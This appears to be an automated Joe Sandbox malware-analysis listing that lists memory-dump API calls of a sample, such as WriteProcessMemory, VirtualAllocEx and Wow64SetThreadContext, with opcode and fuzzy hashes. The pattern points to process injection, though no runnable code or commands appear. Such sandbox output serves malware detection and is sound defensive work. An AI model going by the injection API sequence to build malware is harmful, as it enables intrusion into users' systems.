                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 65c0ac379295a33d3d198db88a08d2ee63d8f81379ac1d81425366df5bdc300e
                                                                                  • Instruction ID: b326a95ce0e3c23f350c11c502ef96e8dc508aab7002dc7f1ab7ac1b412877f7
                                                                                  • Opcode Fuzzy Hash: 65c0ac379295a33d3d198db88a08d2ee63d8f81379ac1d81425366df5bdc300e
                                                                                  • Instruction Fuzzy Hash: F8215AB18002599FDB10CFAAC941BEEFBF5FF48310F10842AE554A7250C7399955DFA4
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 075BFEF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058988226.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_75a0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: bba2db0e22223a4ff4fe72252379612ffe39c1b90b42762cbe50ea835e530911
                                                                                  • Instruction ID: e3b9236e50d605e72c1df44f17feffe5471ce0e0c4b07672814094884eb6b30c
                                                                                  • Opcode Fuzzy Hash: bba2db0e22223a4ff4fe72252379612ffe39c1b90b42762cbe50ea835e530911
                                                                                  • Instruction Fuzzy Hash: 372127B1900359DFDB10CFA9C985BEEBBF5FF48310F10842AE959A7251C7789944CBA4
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074BF6B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 055767c4aa6b02702ac8dd37f84cac7cd15bee7a9fa5617be8c8e6c58c51fb4d
                                                                                  • Instruction ID: 53a28972c455429967b8b000245b4a9f93bc713761d399323ffb1bb63289c9cf
                                                                                  • Opcode Fuzzy Hash: 055767c4aa6b02702ac8dd37f84cac7cd15bee7a9fa5617be8c8e6c58c51fb4d
                                                                                  • Instruction Fuzzy Hash: 4C2136B19002099FDB20DFAAC885BEEBBF4EB48224F14842AD459A7251D7789945CFA4
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 074B5594
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: eb20c92604ad325a31c64f20ca47a43d5666785bc52bf9c5ffba79e8362efdb1
                                                                                  • Instruction ID: 0ab8c92e4f8a778d9cb25d43092a4ac44d6a37c2dbf92dfa540d591a02e35b03
                                                                                  • Opcode Fuzzy Hash: eb20c92604ad325a31c64f20ca47a43d5666785bc52bf9c5ffba79e8362efdb1
                                                                                  • Instruction Fuzzy Hash: 872148B18002599FDB10DFAAC841BEEFBF5FF48320F14842AE958A7250C7389954DFA4
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133CBD6,?,?,?,?,?), ref: 0133CC97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 9477f4b86362272fa0605d335a0d65d58344267eb4f780e76b52700d223b15b4
                                                                                  • Instruction ID: 72a6753a75a8481c2740036008feee98f1209c309b31d8477974c662c2731f6a
                                                                                  • Opcode Fuzzy Hash: 9477f4b86362272fa0605d335a0d65d58344267eb4f780e76b52700d223b15b4
                                                                                  • Instruction Fuzzy Hash: 3D21E5B59002089FDB10CF9AD584ADEFBF4EB48314F14845AE914B7310D375A954CFA4
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0133CBD6,?,?,?,?,?), ref: 0133CC97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 122af2a761b90d796f2c634a23ad8a7be731aea61adfbaf5bdd91f0bc9c443d6
                                                                                  • Instruction ID: 8c869725c35ced75785db9eabc4e9419795147f3db4f50ca849cd92ea12364ba
                                                                                  • Opcode Fuzzy Hash: 122af2a761b90d796f2c634a23ad8a7be731aea61adfbaf5bdd91f0bc9c443d6
                                                                                  • Instruction Fuzzy Hash: 1621E3B5900258DFDB10CFA9D584ADEFBF4EB48314F14845AE958B3210C378A945CFA4
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074BF6B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058872961.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74b0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: c440a5dc30890661f2551f5dc30c9bced39453b234b7a222a4dc07895f0bddab
                                                                                  • Instruction ID: bc4985856c958a512878bb7db759cc54bb951efdddb65a27d0b43b56ae8bdeca
                                                                                  • Opcode Fuzzy Hash: c440a5dc30890661f2551f5dc30c9bced39453b234b7a222a4dc07895f0bddab
                                                                                  • Instruction Fuzzy Hash: 49213AB19003098FDB10DFAAC4457EEBBF4EF48324F14842AD459A7251D7789945CFA4
                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07159534
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: b68ae32e1ee5c9797d0474bb537eddd7fdd437c130ac057b18c9b8e00297d5ea
                                                                                  • Instruction ID: 0f14f15b88d25100c170b80e36218d76c9b6cd78298dfb6bb20dcbf36ba34e2c
                                                                                  • Opcode Fuzzy Hash: b68ae32e1ee5c9797d0474bb537eddd7fdd437c130ac057b18c9b8e00297d5ea
                                                                                  • Instruction Fuzzy Hash: 972148B19002099FDB10DFAAC544BEEBBF4EF48320F24842AD459A7250DB74A944CFA0
                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07159534
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 900c35c4fb7b9cecb5b9f8e118056207740594370a80c01869d998d4da1c2e69
                                                                                  • Instruction ID: 4042b87eddf0ecd744ff62a08d7496fb7747572709454a93dd4e377191e62908
                                                                                  • Opcode Fuzzy Hash: 900c35c4fb7b9cecb5b9f8e118056207740594370a80c01869d998d4da1c2e69
                                                                                  • Instruction Fuzzy Hash: C72127B1900209DFDB14DFAAC545BEEFBF4EF48320F14842AD459A7250C778A544CFA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: af6981a427d9d82b367b08ad755499111bbb7b21d09070a494504b7792c1fbaa
                                                                                  • Instruction ID: 6633e3aa9743488ee8b31d17ed3521c9b47faae236245116647e0933488cc5e5
                                                                                  • Opcode Fuzzy Hash: af6981a427d9d82b367b08ad755499111bbb7b21d09070a494504b7792c1fbaa
                                                                                  • Instruction Fuzzy Hash: 7E116DB19003598FDB14DFAAC4457EEFFF9AF48320F14841AD855A7250CB759944CBA4
                                                                                  APIs
                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 070AF5BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054422216.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70a0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: d8fee2c838d0b0df95c18220f878ebf500be075561fd96d15ea1b155f201155c
                                                                                  • Instruction ID: 4b51638c2e6ede5c08e397c57421f135598ad79c66bdde967ac0a1d930e66c4a
                                                                                  • Opcode Fuzzy Hash: d8fee2c838d0b0df95c18220f878ebf500be075561fd96d15ea1b155f201155c
                                                                                  • Instruction Fuzzy Hash: 5B1106B1D002499FDB10DFAAC844BDEFBF4EF48320F14842AD559A7250C775A944CFA4
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055062061.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7150000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: c49aa29614591d97aa592fd0e0518072cd832b7792f064f0120ab74f7c4eb783
                                                                                  • Instruction ID: defe9566b1ad8b29762cc252d37aa164f5ba349cf72921e96d7ba52945954f10
                                                                                  • Opcode Fuzzy Hash: c49aa29614591d97aa592fd0e0518072cd832b7792f064f0120ab74f7c4eb783
                                                                                  • Instruction Fuzzy Hash: 66113AB19002598FDB14DFAAC444BEEFBF9AB88320F14841AD855A7250C7749944CBA4
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0717FE7E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2055147805.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7170000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 81891351a47992935a3da710734b704184ceb4c60c34f4295f0f3634b9bce106
                                                                                  • Instruction ID: 745105f0ee7dd07b70429bb398783d136060e277c6edcfac05c7a788723cc946
                                                                                  • Opcode Fuzzy Hash: 81891351a47992935a3da710734b704184ceb4c60c34f4295f0f3634b9bce106
                                                                                  • Instruction Fuzzy Hash: 671137B19002499FCB10DFAAC944BDFBFF9EF88320F148819E559A7250CB75A944CFA4
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 01338E9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 76e64b878b29c1b672dd7c451468e29794a41dee758ae716ab7ceaba7b5fffd7
                                                                                  • Instruction ID: 91376c6ec07a6f0ea238e008900118b7318ee64315c3c512373dcbbb0c2db007
                                                                                  • Opcode Fuzzy Hash: 76e64b878b29c1b672dd7c451468e29794a41dee758ae716ab7ceaba7b5fffd7
                                                                                  • Instruction Fuzzy Hash: AC21CDB4804398CFDB21CF59C4047EEBFF0EB49314F044599D498A7242C3799688CBA5
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 01338E9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 55efa787ef5a579b8ce9da298650a2099b394b4d5d969b5f138425bd888067a9
                                                                                  • Instruction ID: 8c01cb4362ba688074cfd9facf9ff2bdd34f8c988c7c956f1108ae8786c30f9a
                                                                                  • Opcode Fuzzy Hash: 55efa787ef5a579b8ce9da298650a2099b394b4d5d969b5f138425bd888067a9
                                                                                  • Instruction Fuzzy Hash: 7B118BB5804399CEDB20CF59C5047EEBFF4EB49318F148599D588B7242C379A688CBA9
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0133A57E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 6a1164b68597136ae4a7b176401776a26e83281e9892c9fc910dc2defdb69ce6
                                                                                  • Instruction ID: 8a2f15403c28155ebc69bb386675b949daaf4d6e2f262dfed84dfb124d681759
                                                                                  • Opcode Fuzzy Hash: 6a1164b68597136ae4a7b176401776a26e83281e9892c9fc910dc2defdb69ce6
                                                                                  • Instruction Fuzzy Hash: BE110FB6C00349CFDB10CF9AC444ADEFBF4AB88224F10842AD898A7250D379A545CFA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,oq
                                                                                  • API String ID: 0-651702701
                                                                                  • Opcode ID: f606dbe2c30953b5fc358a87f92acca9cbf52dd6e63d2113a9d028ce326606ea
                                                                                  • Instruction ID: 673202eb70a26164e496d66aec29f3ec548d8f2bea39747a65ad5d98033a0ca4
                                                                                  • Opcode Fuzzy Hash: f606dbe2c30953b5fc358a87f92acca9cbf52dd6e63d2113a9d028ce326606ea
                                                                                  • Instruction Fuzzy Hash: 6EC172B4A002299FDB14CB69C951BDDBBF6BF88700F158199E509AB3A4CA31DD81CF61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Plkq
                                                                                  • API String ID: 0-177148220
                                                                                  • Opcode ID: 2b757b5fbeff07cb3735e5ed0320a2ade73df1e8c7c7e31c3937d02135284631
                                                                                  • Instruction ID: a4540d3f2695af0491637d4b38ba49ff0a182d0837da0075958cf99161bbce75
                                                                                  • Opcode Fuzzy Hash: 2b757b5fbeff07cb3735e5ed0320a2ade73df1e8c7c7e31c3937d02135284631
                                                                                  • Instruction Fuzzy Hash: 41911570B001158FCB14DF29C584AAABBF6BF89710B1580AAE505DF3B5DB71EC42CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 2e7632f99ab385a56ebe94c95fc6e08cdeef9ef83796f061c6dfe0cb8428d611
                                                                                  • Instruction ID: b11206376966e59caa2c224daa95ca1002088d22d61bf9dfddd6f4aee66cf1d9
                                                                                  • Opcode Fuzzy Hash: 2e7632f99ab385a56ebe94c95fc6e08cdeef9ef83796f061c6dfe0cb8428d611
                                                                                  • Instruction Fuzzy Hash: 40A10CB4A10218DFCB05EFA8D9949DDB7B2FF89310F558159E845AB3A4DB34AC42CF81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 4c8d78c54050948249b63b263dcdc9892a37d49b354c46a97d6a01e94069376c
                                                                                  • Instruction ID: 803e2996f11d3831e9418ec0ee02ccb99867ab8f05e59869a77eb8da2c95e5ae
                                                                                  • Opcode Fuzzy Hash: 4c8d78c54050948249b63b263dcdc9892a37d49b354c46a97d6a01e94069376c
                                                                                  • Instruction Fuzzy Hash: B4713BB0B40214DFDB15DB65C994BAE77B6EF8C700F10846AE505AB3A4CB75EC42CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: poq
                                                                                  • API String ID: 0-1570044193
                                                                                  • Opcode ID: 986787c0bd809f831b534f141b4c1a59054b6f06473da9c73f22d6f27d7c0847
                                                                                  • Instruction ID: f88d6080a925b3e4cbfcdabf8d9c547b9b7685e99fba7dbe5876b3c778d13617
                                                                                  • Opcode Fuzzy Hash: 986787c0bd809f831b534f141b4c1a59054b6f06473da9c73f22d6f27d7c0847
                                                                                  • Instruction Fuzzy Hash: 5A517C76600114AFCB459FA9D944D6A7BB7FF9C31071680A8E2098B372DB32DC62EB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq
                                                                                  • API String ID: 0-3175707579
                                                                                  • Opcode ID: c2275145a6ac8120002a522e2a3ad1478352e08216dbd24405f8bc1207f32e22
                                                                                  • Instruction ID: 953ce900213e9dde1341995652bab767c90aa2da8b8466660dd4f6aa376e1cfe
                                                                                  • Opcode Fuzzy Hash: c2275145a6ac8120002a522e2a3ad1478352e08216dbd24405f8bc1207f32e22
                                                                                  • Instruction Fuzzy Hash: 1E518E76704244AFCB069F69D854D597FB6EF8932071A80E6E209CF3B2CB36D811DB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: c7ea99d8518f263fb625bb93ddcd523ce46bf256663409446ebd3a5d84960aa7
                                                                                  • Instruction ID: 35f27655f21377e81c98655f2170a99ca2a43b82389e3cf9ea2e88a1ce82a615
                                                                                  • Opcode Fuzzy Hash: c7ea99d8518f263fb625bb93ddcd523ce46bf256663409446ebd3a5d84960aa7
                                                                                  • Instruction Fuzzy Hash: 6B41C7B0B106149FCB05AB65D4A4AEEB7B7EFCD600F10452EE446AB394CF749C06CB92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: df661ff27b16ef21fadeeb33c6c42cc7d2f70bac9f3346602ff8a205c2ac1a84
                                                                                  • Instruction ID: b6ea69c3bb0a88720ca1dade41c619cdb6aa7df002f979d571cd9b89aff40be8
                                                                                  • Opcode Fuzzy Hash: df661ff27b16ef21fadeeb33c6c42cc7d2f70bac9f3346602ff8a205c2ac1a84
                                                                                  • Instruction Fuzzy Hash: C8418EB53402109FD318DB29C9A4B6B7BA6AFCC710F104569E10ACF3A5DE75EC42C791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 5cccb76b93a3062348bbb8566c7d11079b1c4615c1f8af5f2432cff960c9e5be
                                                                                  • Instruction ID: 443ca162bcb3fd3d1f30c6442f302d970a0a7d68bc90186d2df280ec1d4f77b3
                                                                                  • Opcode Fuzzy Hash: 5cccb76b93a3062348bbb8566c7d11079b1c4615c1f8af5f2432cff960c9e5be
                                                                                  • Instruction Fuzzy Hash: 053159B53406149FD308DB69C9A8B6B77AAEFCC700F104568E60A8F3A5CE75EC42C791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: ed04fbb28f62dc5482215696183201ef50df0259bdccf85f36b2d1536a630d7a
                                                                                  • Instruction ID: 8fe48cde623c40d4ada3b05e91ef270caf5180ce2acc52ce3cd56a88ebcd380d
                                                                                  • Opcode Fuzzy Hash: ed04fbb28f62dc5482215696183201ef50df0259bdccf85f36b2d1536a630d7a
                                                                                  • Instruction Fuzzy Hash: 8031C871A002459FCF059F64C9A4999BF76FF8D310B1540AAE6456F3A1DB31EC53CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2058292936.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7430000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: p<kq
                                                                                  • API String ID: 0-3321991346
                                                                                  • Opcode ID: 71f19e5984d0373cc65508ba02b5e48374dae98b16af6b816c0563971b40987c
                                                                                  • Instruction ID: 33fcac0d8884cb35a843f8bb2fd2915f26fcb099713ab6caa4bbf39b76bfeebc
                                                                                  • Opcode Fuzzy Hash: 71f19e5984d0373cc65508ba02b5e48374dae98b16af6b816c0563971b40987c
                                                                                  • Instruction Fuzzy Hash: 872160B53042959FCB158F29CC50AEA7BE5BF8E210B194096FD45CB3B1C675DC51CB60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054592830.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70f0000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: ba9da258c965a5ba893bbb9221a40682b6d6f29559f612e2d40e8eeae4346f5b
                                                                                  • Instruction ID: 2dbf95a64dd2d98ebb997c43792663124a4712e4b7e66350f030644e2a71ee59
                                                                                  • Opcode Fuzzy Hash: ba9da258c965a5ba893bbb9221a40682b6d6f29559f612e2d40e8eeae4346f5b
                                                                                  • Instruction Fuzzy Hash: B5216BB4E0424ACFDB15CFA9D5146FEBBB1FF49301F1082AAD611A7691CB381A85CF91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2054942667.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7140000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Tekq
                                                                                  • API String ID: 0-2319236580
                                                                                  • Opcode ID: b372fefab44d68731467abcebf1ec2fe24b1f450a10af77d3eb31fbd9b7a3ad6
                                                                                  • Instruction ID: 455284128cf4fc7d75428c0a5d8934b498097cf5707a0d93bd3e9d88b04f3ade
                                                                                  • Opcode Fuzzy Hash: b372fefab44d68731467abcebf1ec2fe24b1f450a10af77d3eb31fbd9b7a3ad6
                                                                                  • Instruction Fuzzy Hash: 7521F3B4A41129CFDB68DF69C890BA9B7F2FB8A700F1181A9D40DA7384DB346D85CF50
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0133FEFB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 83be5932f6fe4034a15cea783a94ec98a64aa4a3bd6016fc6a844b0c7e3137f9
                                                                                  • Instruction ID: 04dd1e0aceabd149df242da56472181af97221ae6aa257aaacc1cebbb678923e
                                                                                  • Opcode Fuzzy Hash: 83be5932f6fe4034a15cea783a94ec98a64aa4a3bd6016fc6a844b0c7e3137f9
                                                                                  • Instruction Fuzzy Hash: 211159758002489BCB10DFAAC844BDEBFF9EB88320F148419D455A7210C7759544CFA5
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0133FEFB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2030531870.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1330000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 76d5c0b4bf7df0b353e20ab6ba84af955027edd13485a503fa27b38c50cca5b1
